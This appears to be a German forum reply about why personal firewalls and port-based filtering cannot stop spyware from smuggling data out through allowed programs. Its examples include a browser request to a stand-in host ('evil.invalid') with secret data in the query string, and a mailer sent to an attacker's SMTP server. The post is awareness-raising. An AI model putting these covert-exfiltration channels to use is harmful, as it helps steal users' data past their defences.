Bitte sinnvoll zitieren. Danke.
Wenn man nun eine PF verwendet und sie so konfiguriert, dass
z.B. nur der Browser über Port 80 raus darf und das
Mailprogramm über 110 und 25, und alles andere verbietet, kann
man dann nicht solche Tunneling-Mechanismen verhindern?
Nein. Ich veranlasse den browser eine URL der Art http://www.evil.invalid/info?this+is+my+secret+infor… aufzurufen (IIRC verwendert der real player ein solches System). Oder ich bringe den mailer dazu, sich zu meinem eigenen (speziellen) SMTP server zu verbinden und den mit "RCPT TO: " vollzulabern. Oder, oder, oder…
Die Strategien, solche Dinge zu verhindern, sind ziemlich aufwendig. Fakt ist, dass AFAIK gegen solche Angriffe ZoneAlarm gaenzlich ungeeignet ist. Andere personal firewalls koennten bei richtiger Konfiguration solche Szenarien vielleicht abwenden. Bei der Konfiguration ist der der standard user aber ziemlich faul und teilweise auch unfaehig: viele kennen noch nicht mal den Unterschied zwischen Ziel- und Quellport. I.A. verursacht er mit seinem Tun mehr Probleme (fuer sich und seine Umwelt), schlaegt dann in Foren wie diesem auf und jammert rum.
Das ist aber gar nicht der Punkt. Entscheidend ist, dass die meisten Menschen sich ihre Buechse mit so einem Haufen software zukleistern und sich dann ultra krass sicher vorkommen. Es geht darum, ein Bewusstsein fuer diese Angriffsszenarien zu entwickeln und den Menschen einzuschaerfen, dass _nichts_ sie wirklich so gut schuetzt, dass sie ihren Verstand abschalten und jedes daemliche mail attachment anklicken koennen.
Man müsste sich dann schon eine Spyware einfangen, die z.B.
eine IE-Instanz verwendet (d.h. die explorer.exe aufruft), um
Nachrichten nach draußen zu senden.
Du hast es begriffen. Das Verhalten eines kompromitierten Systems ist undeterminiert -> keine software aus zweifelhaften Quellen.
So eine Spyware habe ich allerdings noch nirgendwo gesehen.
Du und ich haben soeben begriffen, wie das grundsaetzlich funktioniert. Was bringt dich auf den abwegigen Gedanken, „die poesen Purschen“ da draussen waeren daemlicher als wir?
Gruss vom Frank.